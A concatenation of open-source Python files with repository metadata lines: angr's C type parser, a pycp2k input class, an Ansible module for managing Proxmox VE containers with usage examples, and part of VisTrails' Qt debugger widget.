'int8_t': SimTypeNum(8, True),
'uint8_t': SimTypeNum(8, False),
'byte': SimTypeNum(8, False),
'int16_t': SimTypeNum(16, True),
'uint16_t': SimTypeNum(16, False),
'word': SimTypeNum(16, False),
'int32_t': SimTypeNum(32, True),
'uint32_t': SimTypeNum(32, False),
'dword': SimTypeNum(32, False),
'int64_t': SimTypeNum(64, True),
'uint64_t': SimTypeNum(64, False),
'qword': SimTypeNum(64, False),
'ptrdiff_t': SimTypeLong(True),
'size_t': SimTypeLength(False),
'ssize_t': SimTypeLength(True),
'ssize': SimTypeLength(False),
'uintptr_t': SimTypeLong(False),
'string': SimTypeString(),
'wstring': SimTypeWString(),
}
ALL_TYPES.update(BASIC_TYPES)
# this is a hack, pending https://github.com/eliben/pycparser/issues/187
def make_preamble():
out = ['typedef int TOP;']
types_out = []
for ty in ALL_TYPES:
if ty in BASIC_TYPES:
continue
if ' ' in ty:
continue
typ = ALL_TYPES[ty]
if isinstance(typ, (SimTypeFunction, SimTypeString, SimTypeWString)):
continue
if isinstance(typ, (SimTypeNum, SimTypeInt)) and str(typ) not in BASIC_TYPES:
try:
# TODO: Investigate whether this needs to be re-imagined using byte_width
styp = {8: 'char', 16: 'short', 32: 'int', 64: 'long long'}[typ._size]
except KeyError:
styp = 'long' # :(
if not typ.signed:
styp = 'unsigned ' + styp
typ = styp
if isinstance(typ, (SimStruct,)):
types_out.append(str(typ))
out.append('typedef %s %s;' % (typ, ty))
types_out.append(ty)
return '\n'.join(out) + '\n', types_out
def _make_scope():
"""
Generate CParser scope_stack argument to parse method
"""
scope = dict()
for ty in ALL_TYPES:
if ty in BASIC_TYPES:
continue
if ' ' in ty:
continue
typ = ALL_TYPES[ty]
if isinstance(typ, (SimTypeFunction,SimTypeString, SimTypeWString)):
continue
scope[ty] = True
return [scope]
@deprecated(replacement="register_types(parse_type(struct_expr))")
def define_struct(defn):
"""
Register a struct definition globally
>>> define_struct('struct abcd {int x; int y;}')
"""
struct = parse_type(defn)
ALL_TYPES[struct.name] = struct
ALL_TYPES['struct ' + struct.name] = struct
return struct
def register_types(types):
"""
Pass in some types and they will be registered to the global type store.
The argument may be either a mapping from name to SimType, or a plain SimType.
The plain SimType must be either a struct or union type with a name present.
>>> register_types(parse_types("typedef int x; typedef float y;"))
>>> register_types(parse_type("struct abcd { int ab; float cd; }"))
"""
if type(types) is SimStruct:
if types.name == '<anon>':
raise ValueError("Cannot register anonymous struct")
ALL_TYPES['struct ' + types.name] = types
elif type(types) is SimUnion:
if types.name == '<anon>':
raise ValueError("Cannot register anonymous union")
ALL_TYPES['union ' + types.name] = types
else:
ALL_TYPES.update(types)
def do_preprocess(defn):
"""
Run a string through the C preprocessor that ships with pycparser but is weirdly inaccessible?
"""
from pycparser.ply import lex, cpp
lexer = lex.lex(cpp)
p = cpp.Preprocessor(lexer)
# p.add_path(dir) will add dir to the include search path
p.parse(defn)
return ''.join(tok.value for tok in p.parser if tok.type not in p.ignore)
def parse_defns(defn, preprocess=True):
"""
Parse a series of C definitions, returns a mapping from variable name to variable type object
"""
return parse_file(defn, preprocess=preprocess)[0]
def parse_types(defn, preprocess=True):
"""
Parse a series of C definitions, returns a mapping from type name to type object
"""
return parse_file(defn, preprocess=preprocess)[1]
_include_re = re.compile(r'^\s*#include')
def parse_file(defn, preprocess=True):
"""
Parse a series of C definitions, returns a tuple of two type mappings, one for variable
definitions and one for type definitions.
"""
if pycparser is None:
raise ImportError("Please install pycparser in order to parse C definitions")
defn = '\n'.join(x for x in defn.split('\n') if _include_re.match(x) is None)
if preprocess:
defn = do_preprocess(defn)
preamble, ignoreme = make_preamble()
node = pycparser.c_parser.CParser().parse(preamble + defn)
if not isinstance(node, pycparser.c_ast.FileAST):
raise ValueError("Something went horribly wrong using pycparser")
out = {}
extra_types = {}
for piece in node.ext:
if isinstance(piece, pycparser.c_ast.FuncDef):
out[piece.decl.name] = _decl_to_type(piece.decl.type, extra_types)
elif isinstance(piece, pycparser.c_ast.Decl):
ty = _decl_to_type(piece.type, extra_types)
if piece.name is not None:
out[piece.name] = ty
elif isinstance(piece, pycparser.c_ast.Typedef):
extra_types[piece.name] = _decl_to_type(piece.type, extra_types)
for ty in ignoreme:
del extra_types[ty]
return out, extra_types
def parse_type(defn, preprocess=True):
"""
Parse a simple type expression into a SimType
>>> parse_type('int *')
"""
if pycparser is None:
raise ImportError("Please install pycparser in order to parse C definitions")
defn = re.sub(r"/\*.*?\*/", r"", defn)
parser = pycparser.CParser()
parser.cparser = pycparser.ply.yacc.yacc(module=parser,
start='parameter_declaration',
debug=False,
optimize=False,
errorlog=errorlog)
node = parser.parse(text=defn, scope_stack=_make_scope())
if not isinstance(node, pycparser.c_ast.Typename) and \
not isinstance(node, pycparser.c_ast.Decl):
raise ValueError("Something went horribly wrong using pycparser")
decl = node.type
return _decl_to_type(decl)
def _accepts_scope_stack():
"""
pycparser hack to include scope_stack as parameter in CParser parse method
"""
def parse(self, text, scope_stack=None, filename='', debuglevel=0):
self.clex.filename = filename
self.clex.reset_lineno()
self._scope_stack = [dict()] if scope_stack is None else scope_stack
self._last_yielded_token = None
return self.cparser.parse(
input=text,
lexer=self.clex,
debug=debuglevel)
setattr(pycparser.CParser, 'parse', parse)
def _decl_to_type(decl, extra_types=None):
if extra_types is None: extra_types = {}
if isinstance(decl, pycparser.c_ast.FuncDecl):
argtyps = () if decl.args is None else [_decl_to_type(x.type, extra_types) for x in decl.args.params]
arg_names = [ arg.name for arg in decl.args.params] if decl.args else None
return SimTypeFunction(argtyps, _decl_to_type(decl.type, extra_types), arg_names=arg_names)
elif isinstance(decl, pycparser.c_ast.TypeDecl):
if decl.declname == 'TOP':
return SimTypeTop()
return _decl_to_type(decl.type, extra_types)
elif isinstance(decl, pycparser.c_ast.PtrDecl):
pts_to = _decl_to_type(decl.type, extra_types)
return SimTypePointer(pts_to)
elif isinstance(decl, pycparser.c_ast.ArrayDecl):
elem_type = _decl_to_type(decl.type, extra_types)
try:
size = _parse_const(decl.dim)
except ValueError as e:
l.warning("Got error parsing array dimension, defaulting to zero: %s", e)
size = 0
return SimTypeFixedSizeArray(elem_type, size)
elif isinstance(decl, pycparser.c_ast.Struct):
if decl.decls is not None:
fields = OrderedDict((field.name, _decl_to_type(field.type, extra_types)) for field in decl.decls)
else:
fields = OrderedDict()
if decl.name is not None:
key = 'struct ' + decl.name
if key in extra_types:
struct = extra_types[key]
elif key in ALL_TYPES:
struct = ALL_TYPES[key]
else:
struct = None
if struct is None:
struct = SimStruct(fields, decl.name)
elif not struct.fields:
struct.fields = fields
elif fields and struct.fields != fields:
raise ValueError("Redefining body of " + key)
extra_types[key] = struct
else:
struct = SimStruct(fields)
return struct
elif isinstance(decl, pycparser.c_ast.Union):
if decl.decls is not None:
fields = {field.name: _decl_to_type(field.type, extra_types) for field in decl.decls}
else:
fields = {}
if decl.name is not None:
key = 'union ' + decl.name
if key in extra_types:
union = extra_types[key]
elif key in ALL_TYPES:
union = ALL_TYPES[key]
else:
union = None
if union is None:
union = SimUnion(fields, decl.name)
elif not union.members:
union.members = fields
elif fields and union.members != fields:
raise ValueError("Redefining body of " + key)
extra_types[key] = union
else:
union = SimUnion(fields)
return union
elif isinstance(decl, pycparser.c_ast.IdentifierType):
key = ' '.join(decl.names)
if key in extra_types:
return extra_types[key]
elif key in ALL_TYPES:
return ALL_TYPES[key]
else:
raise TypeError("Unknown type '%s'" % ' '.join(key))
raise ValueError("Unknown type!")
def _parse_const(c):
if type(c) is pycparser.c_ast.Constant:
return int(c.value)
elif type(c) is pycparser.c_ast.BinaryOp:
if c.op == '+':
return _parse_const(c.children()[0][1]) + _parse_const(c.children()[1][1])
if c.op == '-':
return _parse_const(c.children()[0][1]) - _parse_const(c.children()[1][1])
if c.op == '*':
return _parse_const(c.children()[0][1]) * _parse_const(c.children()[1][1])
if c.op == '/':
return _parse_const(c.children()[0][1]) // _parse_const(c.children()[1][1])
raise ValueError('Binary op %s' % c.op)
else:
raise ValueError(c)
if pycparser is not None:
_accepts_scope_stack()
try:
register_types(parse_types("""
typedef long time_t;
struct timespec {
time_t tv_sec;
long tv_nsec;
};
struct timeval {
time_t tv_sec;
long tv_usec;
};
"""))
except ImportError:
pass
from .state_plugins.view import SimMemView
| iamahuman/angr | angr/sim_type.py | Python | bsd-2-clause | 38,799 |
from pycp2k.inputsection import InputSection
class _point65(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Type = None
self.Atoms = []
self.Weights = []
self.Xyz = None
self._name = "POINT"
self._keywords = {'Xyz': 'XYZ', 'Type': 'TYPE'}
self._repeated_keywords = {'Atoms': 'ATOMS', 'Weights': 'WEIGHTS'}
| SINGROUP/pycp2k | pycp2k/classes/_point65.py | Python | lgpl-3.0 | 397 |
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: proxmox
short_description: management of instances in Proxmox VE cluster
description:
- allows you to create/delete/stop instances in Proxmox VE cluster
- Starting in Ansible 2.1, it automatically detects containerization type (lxc for PVE 4, openvz for older)
version_added: "2.0"
options:
api_host:
description:
- the host of the Proxmox VE cluster
required: true
api_user:
description:
- the user to authenticate with
required: true
api_password:
description:
- the password to authenticate with
- you can use PROXMOX_PASSWORD environment variable
default: null
required: false
vmid:
description:
- the instance id
default: null
required: true
validate_certs:
description:
- enable / disable https certificate verification
default: false
required: false
type: boolean
node:
description:
- Proxmox VE node, when new VM will be created
- required only for C(state=present)
- for another states will be autodiscovered
default: null
required: false
password:
description:
- the instance root password
- required only for C(state=present)
default: null
required: false
hostname:
description:
- the instance hostname
- required only for C(state=present)
default: null
required: false
ostemplate:
description:
- the template for VM creating
- required only for C(state=present)
default: null
required: false
disk:
description:
- hard disk size in GB for instance
default: 3
required: false
cpus:
description:
- numbers of allocated cpus for instance
default: 1
required: false
memory:
description:
- memory size in MB for instance
default: 512
required: false
swap:
description:
- swap memory size in MB for instance
default: 0
required: false
netif:
description:
- specifies network interfaces for the container
default: null
required: false
type: A hash/dictionary defining interfaces
mounts:
description:
- specifies additional mounts (separate disks) for the container
default: null
required: false
type: A hash/dictionary defining mount points
version_added: "2.2"
ip_address:
description:
- specifies the address the container will be assigned
default: null
required: false
type: string
onboot:
description:
- specifies whether a VM will be started during system bootup
default: false
required: false
type: boolean
storage:
description:
- target storage
default: 'local'
required: false
type: string
cpuunits:
description:
- CPU weight for a VM
default: 1000
required: false
type: integer
nameserver:
description:
- sets DNS server IP address for a container
default: null
required: false
type: string
searchdomain:
description:
- sets DNS search domain for a container
default: null
required: false
type: string
timeout:
description:
- timeout for operations
default: 30
required: false
type: integer
force:
description:
- forcing operations
- can be used only with states C(present), C(stopped), C(restarted)
- with C(state=present) force option allow to overwrite existing container
- with states C(stopped) , C(restarted) allow to force stop instance
default: false
required: false
type: boolean
state:
description:
- Indicate desired state of the instance
choices: ['present', 'started', 'absent', 'stopped', 'restarted']
default: present
notes:
- Requires proxmoxer and requests modules on host. This modules can be installed with pip.
requirements: [ "proxmoxer", "python >= 2.7", "requests" ]
author: "Sergei Antipov @UnderGreen"
'''
EXAMPLES = '''
# Create new container with minimal options
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz'
# Create new container with minimal options with force(it will rewrite existing container)
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' force=yes
# Create new container with minimal options use environment PROXMOX_PASSWORD variable(you should export it before)
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz'
# Create new container with minimal options defining network interface with dhcp
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' netif='{"net0":"name=eth0,ip=dhcp,ip6=dhcp,bridge=vmbr0"}'
# Create new container with minimal options defining network interface with static ip
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' netif='{"net0":"name=eth0,gw=192.168.0.1,ip=192.168.0.2/24,bridge=vmbr0"}'
# Create new container with minimal options defining a mount
- proxmox: vmid=100 node='uk-mc02' api_user='root@pam' api_password='1q2w3e' api_host='node1' password='123456' hostname='example.org' ostemplate='local:vztmpl/ubuntu-14.04-x86_64.tar.gz' mounts='{"mp0":"local:8,mp=/mnt/test/"}'
# Start container
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=started
# Stop container
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=stopped
# Stop container with force
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' force=yes state=stopped
# Restart container(stopped or mounted container you can't restart)
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=stopped
# Remove container
- proxmox: vmid=100 api_user='root@pam' api_password='1q2w3e' api_host='node1' state=absent
'''
import os
import time
try:
from proxmoxer import ProxmoxAPI
HAS_PROXMOXER = True
except ImportError:
HAS_PROXMOXER = False
VZ_TYPE=None
def get_instance(proxmox, vmid):
return [ vm for vm in proxmox.cluster.resources.get(type='vm') if vm['vmid'] == int(vmid) ]
def content_check(proxmox, node, ostemplate, template_store):
return [ True for cnt in proxmox.nodes(node).storage(template_store).content.get() if cnt['volid'] == ostemplate ]
def node_check(proxmox, node):
return [ True for nd in proxmox.nodes.get() if nd['node'] == node ]
def create_instance(module, proxmox, vmid, node, disk, storage, cpus, memory, swap, timeout, **kwargs):
proxmox_node = proxmox.nodes(node)
kwargs = dict((k,v) for k, v in kwargs.iteritems() if v is not None)
if VZ_TYPE =='lxc':
kwargs['cpulimit']=cpus
kwargs['rootfs']=disk
if 'netif' in kwargs:
kwargs.update(kwargs['netif'])
del kwargs['netif']
if 'mounts' in kwargs:
kwargs.update(kwargs['mounts'])
del kwargs['mounts']
else:
kwargs['cpus']=cpus
kwargs['disk']=disk
taskid = getattr(proxmox_node, VZ_TYPE).create(vmid=vmid, storage=storage, memory=memory, swap=swap, **kwargs)
while timeout:
if ( proxmox_node.tasks(taskid).status.get()['status'] == 'stopped'
and proxmox_node.tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
module.fail_json(msg='Reached timeout while waiting for creating VM. Last line in task before timeout: %s'
% proxmox_node.tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def start_instance(module, proxmox, vm, vmid, timeout):
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.start.post()
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
module.fail_json(msg='Reached timeout while waiting for starting VM. Last line in task before timeout: %s'
% proxmox.nodes(vm[0]['node']).tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def stop_instance(module, proxmox, vm, vmid, timeout, force):
if force:
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.shutdown.post(forceStop=1)
else:
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.shutdown.post()
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
module.fail_json(msg='Reached timeout while waiting for stopping VM. Last line in task before timeout: %s'
% proxmox_node.tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def umount_instance(module, proxmox, vm, vmid, timeout):
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.umount.post()
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
return True
timeout = timeout - 1
if timeout == 0:
module.fail_json(msg='Reached timeout while waiting for unmounting VM. Last line in task before timeout: %s'
% proxmox_node.tasks(taskid).log.get()[:1])
time.sleep(1)
return False
def main():
module = AnsibleModule(
argument_spec = dict(
api_host = dict(required=True),
api_user = dict(required=True),
api_password = dict(no_log=True),
vmid = dict(required=True),
validate_certs = dict(type='bool', default='no'),
node = dict(),
password = dict(no_log=True),
hostname = dict(),
ostemplate = dict(),
disk = dict(type='str', default='3'),
cpus = dict(type='int', default=1),
memory = dict(type='int', default=512),
swap = dict(type='int', default=0),
netif = dict(type='dict'),
mounts = dict(type='dict'),
ip_address = dict(),
onboot = dict(type='bool', default='no'),
storage = dict(default='local'),
cpuunits = dict(type='int', default=1000),
nameserver = dict(),
searchdomain = dict(),
timeout = dict(type='int', default=30),
force = dict(type='bool', default='no'),
state = dict(default='present', choices=['present', 'absent', 'stopped', 'started', 'restarted']),
)
)
if not HAS_PROXMOXER:
module.fail_json(msg='proxmoxer required for this module')
state = module.params['state']
api_user = module.params['api_user']
api_host = module.params['api_host']
api_password = module.params['api_password']
vmid = module.params['vmid']
validate_certs = module.params['validate_certs']
node = module.params['node']
disk = module.params['disk']
cpus = module.params['cpus']
memory = module.params['memory']
swap = module.params['swap']
storage = module.params['storage']
if module.params['ostemplate'] is not None:
template_store = module.params['ostemplate'].split(":")[0]
timeout = module.params['timeout']
# If password not set get it from PROXMOX_PASSWORD env
if not api_password:
try:
api_password = os.environ['PROXMOX_PASSWORD']
except KeyError as e:
module.fail_json(msg='You should set api_password param or use PROXMOX_PASSWORD environment variable')
try:
proxmox = ProxmoxAPI(api_host, user=api_user, password=api_password, verify_ssl=validate_certs)
global VZ_TYPE
VZ_TYPE = 'openvz' if float(proxmox.version.get()['version']) < 4.0 else 'lxc'
except Exception as e:
module.fail_json(msg='authorization on proxmox cluster failed with exception: %s' % e)
if state == 'present':
try:
if get_instance(proxmox, vmid) and not module.params['force']:
module.exit_json(changed=False, msg="VM with vmid = %s is already exists" % vmid)
elif not (node, module.params['hostname'] and module.params['password'] and module.params['ostemplate']):
module.fail_json(msg='node, hostname, password and ostemplate are mandatory for creating vm')
elif not node_check(proxmox, node):
module.fail_json(msg="node '%s' not exists in cluster" % node)
elif not content_check(proxmox, node, module.params['ostemplate'], template_store):
module.fail_json(msg="ostemplate '%s' not exists on node %s and storage %s"
% (module.params['ostemplate'], node, template_store))
create_instance(module, proxmox, vmid, node, disk, storage, cpus, memory, swap, timeout,
password = module.params['password'],
hostname = module.params['hostname'],
ostemplate = module.params['ostemplate'],
netif = module.params['netif'],
mounts = module.params['mounts'],
ip_address = module.params['ip_address'],
onboot = int(module.params['onboot']),
cpuunits = module.params['cpuunits'],
nameserver = module.params['nameserver'],
searchdomain = module.params['searchdomain'],
force = int(module.params['force']))
module.exit_json(changed=True, msg="deployed VM %s from template %s" % (vmid, module.params['ostemplate']))
except Exception as e:
module.fail_json(msg="creation of %s VM %s failed with exception: %s" % ( VZ_TYPE, vmid, e ))
elif state == 'started':
try:
vm = get_instance(proxmox, vmid)
if not vm:
module.fail_json(msg='VM with vmid = %s not exists in cluster' % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'running':
module.exit_json(changed=False, msg="VM %s is already running" % vmid)
if start_instance(module, proxmox, vm, vmid, timeout):
module.exit_json(changed=True, msg="VM %s started" % vmid)
except Exception as e:
module.fail_json(msg="starting of VM %s failed with exception: %s" % ( vmid, e ))
elif state == 'stopped':
try:
vm = get_instance(proxmox, vmid)
if not vm:
module.fail_json(msg='VM with vmid = %s not exists in cluster' % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'mounted':
if module.params['force']:
if umount_instance(module, proxmox, vm, vmid, timeout):
module.exit_json(changed=True, msg="VM %s is shutting down" % vmid)
else:
module.exit_json(changed=False, msg=("VM %s is already shutdown, but mounted. "
"You can use force option to umount it.") % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'stopped':
module.exit_json(changed=False, msg="VM %s is already shutdown" % vmid)
if stop_instance(module, proxmox, vm, vmid, timeout, force = module.params['force']):
module.exit_json(changed=True, msg="VM %s is shutting down" % vmid)
except Exception as e:
module.fail_json(msg="stopping of VM %s failed with exception: %s" % ( vmid, e ))
elif state == 'restarted':
try:
vm = get_instance(proxmox, vmid)
if not vm:
module.fail_json(msg='VM with vmid = %s not exists in cluster' % vmid)
if ( getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'stopped'
or getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'mounted' ):
module.exit_json(changed=False, msg="VM %s is not running" % vmid)
if ( stop_instance(module, proxmox, vm, vmid, timeout, force = module.params['force']) and
start_instance(module, proxmox, vm, vmid, timeout) ):
module.exit_json(changed=True, msg="VM %s is restarted" % vmid)
except Exception as e:
module.fail_json(msg="restarting of VM %s failed with exception: %s" % ( vmid, e ))
elif state == 'absent':
try:
vm = get_instance(proxmox, vmid)
if not vm:
module.exit_json(changed=False, msg="VM %s does not exist" % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'running':
module.exit_json(changed=False, msg="VM %s is running. Stop it before deletion." % vmid)
if getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE)(vmid).status.current.get()['status'] == 'mounted':
module.exit_json(changed=False, msg="VM %s is mounted. Stop it with force option before deletion." % vmid)
taskid = getattr(proxmox.nodes(vm[0]['node']), VZ_TYPE).delete(vmid)
while timeout:
if ( proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['status'] == 'stopped'
and proxmox.nodes(vm[0]['node']).tasks(taskid).status.get()['exitstatus'] == 'OK' ):
module.exit_json(changed=True, msg="VM %s removed" % vmid)
timeout = timeout - 1
if timeout == 0:
module.fail_json(msg='Reached timeout while waiting for removing VM. Last line in task before timeout: %s'
% proxmox_node.tasks(taskid).log.get()[:1])
time.sleep(1)
except Exception as e:
module.fail_json(msg="deletion of VM %s failed with exception: %s" % ( vmid, e ))
# import module snippets
from ansible.module_utils.basic import *
main()
| Jmainguy/ansible-modules-extras | cloud/misc/proxmox.py | Python | gpl-3.0 | 18,785 |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
from PyQt4 import QtGui, QtCore
import core.system
import copy
import sys
import time
import os.path
import gui.application
from core.interpreter.default import get_default_interpreter
from gui.vistrails_palette import QVistrailsPaletteInterface
############################################################################
class QDebugger(QtGui.QWidget, QVistrailsPaletteInterface):
"""
This class provides a dockable interface to the debugger tree.
"""
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent=parent)
self.app = gui.application.get_vistrails_application()
self.inspector = QObjectInspector()
layout = QtGui.QVBoxLayout()
layout.setMargin(0)
layout.setSpacing(0)
layout.addWidget(self.inspector)
self.setLayout(layout)
# self.setTitleBarWidget(QtGui.QLabel("Debugger"))
self.setWindowTitle("Debugger")
self.controller = None
self.vistrails_interpreter = get_default_interpreter()
self.vistrails_interpreter.debugger = self
def set_controller(self, c):
"""
set_controller(c) -> None
Set the current vistrails controller to be used by the debugger
"""
self.controller = c
self.update()
def update_values(self):
"""
update_vals() -> None
Update the debugger after an execution with any values that become
available on its input ports.
"""
self.update(update_vals=True)
def update(self, update_vals=False):
"""
update(update_vals=False) -> None
Update the debugger. If the update requires querying modules for input
changes, update_vals should be set to True
"""
pipeline = self.controller.current_pipeline
if pipeline is None:
return
self.inspector.clear_modules()
for module in pipeline.module_list:
if module.is_breakpoint or module.is_watched:
self.inspector.add_module(module)
if update_vals:
(module_objects, _, _) = \
self.vistrails_interpreter.find_persistent_entities(pipeline)
for m_id in self.inspector.modules:
if m_id in module_objects and module_objects[m_id] is not None:
self.inspector.update_values(m_id, module_objects[m_id])
elif module_objects[m_id] is None:
edges = pipeline.graph.edges_to(m_id)
self.inspector.update_inputs(m_id, module_objects, edges,
pipeline.connections)
def closeEvent(self, e):
"""closeEvent(e) -> None
Event handler called when the dialog is about to close."""
self.emit(QtCore.SIGNAL("debuggerHidden()"))
###############################################################################
# QObjectInspector
class QObjectInspector(QtGui.QTreeWidget):
"""
This class provides the ability to track and inspect breakpoints added to a pipeline.
It is meant to be embedded in the QDebugger object to allow debugging of workflows in
VisTrails
"""
def __init__(self, parent=None):
QtGui.QTreeWidget.__init__(self, parent)
self.setColumnCount(2)
self.modules = {}
def clear_modules(self):
"""
clear_modules() -> None
Clear the current list of module breakpoints
"""
self.modules = {}
self.clear()
def add_module(self, m):
"""
add_module(m : core.vistrail.module.Module) -> None
Add the give module, m, as a breakpoint.
"""
# !!! This uses the core.vistrail.module.Module item
item = QDebugModuleItem(self)
item.setText(0, "%s (%d)" % (m.name, m.id))
item.setText(1, "Module Type")
self.modules[m.id] = item
# self.add_dict(m, item)
# self.add_ports(m, item, display_vals=get_vals)
def update_values(self, m_id, persistent_module):
"""
update_values(m_id: long,
persistent_module : subclass of core.modules.vistrails_module.Module)
"""
module_item = self.modules[m_id]
module_item.takeChildren()
self.add_dict(persistent_module, module_item)
self.add_ports(persistent_module, module_item, True)
def update_inputs(self, m_id, persistent_map, edges, connections):
input_ports = {}
for upstream_id, c_id in edges:
if upstream_id in persistent_map and \
persistent_map[upstream_id] is not None:
persistent_module = persistent_map[upstream_id]
connection = connections[c_id]
try:
output_port = \
persistent_module.get_output(connection.source.name)
input_ports[connection.destination.name] = output_port
except ModuleError:
input_ports[connection.destination.name] = None
if len(input_ports) > 0:
module_item = self.modules[m_id]
module_item.takeChildren()
inputs_item = QDebugModuleItem(module_item)
inputs_item.setText(0, "inputPorts")
inputs_item.setText(1, "")
for port_name, port_val in input_ports.iteritems():
self.create_port_item(port_name, port_val, True,
inputs_item)
def add_dict(self, m, parent_item):
"""
add_dict(m, parent_item) -> None
Add the dictionary associated with module m to be displayed
as part of the debug information for that breakpoint.
"""
dict_item = QDebugModuleItem(parent_item)
dict_item.setText(0, "__dict__")
dict_item.setText(1, "")
for k in m.__dict__.keys():
d_val = QDebugModuleItem(dict_item)
d_val.setText(0, str(k))
d_val.setText(1, str(m.__dict__[k]))
def create_port_item(self, port_name, port_value, display_vals=False,
parent=None):
p_item = QDebugModuleItem(parent)
p_item.setText(0, str(port_name))
if display_vals:
p_item.setText(1, str(port_value))
else:
typestr = str(port_val.__class__)
typestr = typestr.split('.')
typestr = typestr[len(typestr)-1]
typestr = typestr[0:len(typestr)-2]
p_item.setText(1, typestr)
def add_ports(self, m, parent_item, display_vals=False):
"""
add_ports(m, item, display_vals=False) -> None
Add port information from module m to the item being displayed in the debugger.
If display_vals is True, fetch the appropriate values from the module's input ports.
"""
inputs_item = QDebugModuleItem(parent_item)
inputs_item.setText(0, "inputPorts")
inputs_item.setText(1, "")
for port_name in m.inputPorts:
try:
port_val = m.getInputListFromPort(port_name)
if len(port_val) == 1:
port_val = port_val[0]
except ModuleError:
port_val = None
self.create_port_item(port_name, port_val, display_vals,
inputs_item)
outputs_item = QDebugModuleItem(parent_item)
outputs_item.setText(0, "outputPorts")
outputs_item.setText(1, "")
for port_name in m.outputPorts:
try:
port_val = m.get_output(port_name)
except ModuleError:
port_val = None
self.create_port_item(port_name, port_val, display_vals,
outputs_item)
